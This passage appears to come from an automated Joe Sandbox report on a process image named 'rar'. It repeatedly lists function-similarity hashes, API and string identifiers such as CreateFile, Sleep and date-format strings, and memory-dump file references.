                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwindabort
                                                                                                                                                                                                                              • String ID: csm$f
                                                                                                                                                                                                                              • API String ID: 3913153233-629598281
                                                                                                                                                                                                                              • Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                              • Instruction ID: beab7a0dc9b24e4a22cd93e9755568412bcfb5267170a8dbeae8ef9d8184c535
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D619132A0D662C6FB18FB15E444A79B795FB44BA4F948530EE0E47754DFB8E881C720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$File$swprintf$LocalSystem
                                                                                                                                                                                                                              • String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
                                                                                                                                                                                                                              • API String ID: 1364621626-1794493780
                                                                                                                                                                                                                              • Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                                                                              • Instruction ID: f41472ccd8884beea9d3bd40512a327d449da3481d00146ffb05f4f67bb404cb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18210C76A18251CEE760EF68E4806ADB7F0F748794F544132EE8893B58DB78D5418F10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CharHandleWrite$ByteConsoleFileMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 643171463-0
                                                                                                                                                                                                                              • Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                                                                              • Instruction ID: d6fbf49ba9f4f7a6dd8aea773d19437e58258086aaebcf9914b63586e855ae4b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1741C721E0CAA2C2FA14BB61A8102B9E351BF457F0FC40335DD6D177D1DEBCA4558720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 190572456-0
                                                                                                                                                                                                                              • Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                                                                              • Instruction ID: 0fb5c927b062316ccc7cb112df73d14c773ef5420f7870c9fc9b9d4bce6aef2d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A841B321B0D623D1FA15BB55A8009B5B2A1BF04BF0F8E8935DDAD4B794EEBCE4008360
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                                                                              • Instruction ID: 628532e5751b618584ad9aa7c7d8b09faeb09c110a74acacbbfc472b316a37f6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46114266E1C62385F6643328E486BB99141BF55370F8C4734E97E566E6CEECE4404221
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                                              • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                                                                                                                                                                                              • API String ID: 233258989-622958660
                                                                                                                                                                                                                              • Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                                                                              • Instruction ID: beec7fa2f43bf0991a83ee405923f1d0f9e519bdd224ed245b93b852a2117c7c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47516AF3F3C250CAF3249F1CE841BA96690F764BA0F945A34F94A93B44C63DDA448700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcschr
                                                                                                                                                                                                                              • String ID: MCAOmcao$MCAOmcao
                                                                                                                                                                                                                              • API String ID: 1497570035-1725859250
                                                                                                                                                                                                                              • Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                              • Instruction ID: e36f683307d616d23a828dbd7e37995c4d7fbe89e5da1b8f1524a370d7b25b3d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6441B012D0C5E3C4FA21BF22950157EE261BF11BB4FD84931DA5D4B2D6EEADE9908231
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 904936192-0
                                                                                                                                                                                                                              • Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                              • Instruction ID: 76e862450c4da2114cc6b34e0adc43c024c7e3d200ebe0d592a87c9a6c0a0a2b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0351F262A09A91C1FB00EF25D4403ACB3A5FB88BA4F848231DF9E47795DFB9D555C320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00007FF74EE786CB,?,?,?,00007FF74EE7A5CB,?,?,00000000,?,?,00000040,?,?,00007FF74EE72DF9), ref: 00007FF74EE8D09D
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00007FF74EE786CB,?,?,?,00007FF74EE7A5CB,?,?,00000000,?,?,00000040,?,?,00007FF74EE72DF9), ref: 00007FF74EE8D0E5
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00007FF74EE786CB,?,?,?,00007FF74EE7A5CB,?,?,00000000,?,?,00000040,?,?,00007FF74EE72DF9), ref: 00007FF74EE8D114
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00007FF74EE786CB,?,?,?,00007FF74EE7A5CB,?,?,00000000,?,?,00000040,?,?,00007FF74EE72DF9), ref: 00007FF74EE8D15C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                                                                                                                                                                                              • Instruction ID: e8f39374c41eae7969868b3008d4028ffbeb0022bdf6727765bae997f7d670c4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8314131618B5582F760AF11F55476AB7A5F749BB4F904329EAAC07BC8CF7CD0448B10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF74EEBB6D0: Sleep.KERNEL32(?,?,?,?,00007FF74EE8CBED,?,00000000,?,00007FF74EEB7A8C), ref: 00007FF74EEBB730
                                                                                                                                                                                                                              • new.LIBCMT ref: 00007FF74EEACFD9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                                              • String ID: rar$rev
                                                                                                                                                                                                                              • API String ID: 3472027048-2145959568
                                                                                                                                                                                                                              • Opcode ID: 49267c968bf48376f8bb62a9904bbec435c53818402eee37bb5d47bcb8d29714
                                                                                                                                                                                                                              • Instruction ID: b10e8ac1ed583d8ee90b07dc85038b42511593dbeaab4ada252f58ebded77f18
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49267c968bf48376f8bb62a9904bbec435c53818402eee37bb5d47bcb8d29714
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79A1AE22A0D6A2C5FB20FB20D4542BDA3A6FF547A8FC54039DA5D076D6DEECE544C360
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: e+000$gfff
                                                                                                                                                                                                                              • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                              • Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                                                                              • Instruction ID: 846650c5386190b46f269a0b13b5c3d401f21599a97cb4e5e162be8abd745ec1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F512762F1C7D2C6F725BB359840769AA95F740BA0F8C8231CAA88BBD5CF6CD444C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
